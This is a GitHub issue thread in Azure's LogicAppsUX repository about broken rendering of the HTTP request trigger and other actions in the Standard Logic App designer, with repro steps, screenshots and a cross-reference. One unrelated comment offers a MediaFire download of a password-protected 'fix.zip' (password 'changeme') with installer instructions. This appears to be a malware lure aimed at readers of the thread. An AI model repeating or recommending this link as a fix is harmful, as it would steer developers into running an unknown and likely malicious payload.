### ISSUE TITLE
Http request trigger and actions UI issue

### ISSUE THREAD

**Issue by vgouth** [Azure/LogicAppsUX#5495]
### Describe the Bug with repro steps 

1. Create a standard logic app. 
2. Add a stateful/ stateless workflow. 
3. Add Http request trigger 

**Expected;**Http request trigger UI should be good

**Actual:** Http request trigger UI issue

### What type of Logic App Is this happening in? 

Standard (Portal)

### Which operating system are you using? 

Windows

### Are you using new designer or old designer 

New Designer

### Did you refer to the TSG before filing this issue? [https://aka.ms/lauxtsg](<https://aka.ms/lauxtsg>) 

Yes

### Workflow JSON 

*No response*

### Screenshots or Videos 

![image](<https://github.com/user-attachments/assets/d8b6daee-6982-4601-a38a-998d6a0379a8>)

### Browser 

Edge

### Additional context 

**Version:** 2\.40826.1.3

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vgouth** [comment]
**Note:** Not only Http request trigger all the other actions also has similar UI issue
![image](https://github.com/user-attachments/assets/b5c31696-d41f-470b-9d06-16c30e721e84)

**Comment by ccastrotrejo** [comment]
Related to https://github.com/Azure/LogicAppsUX/issues/5486
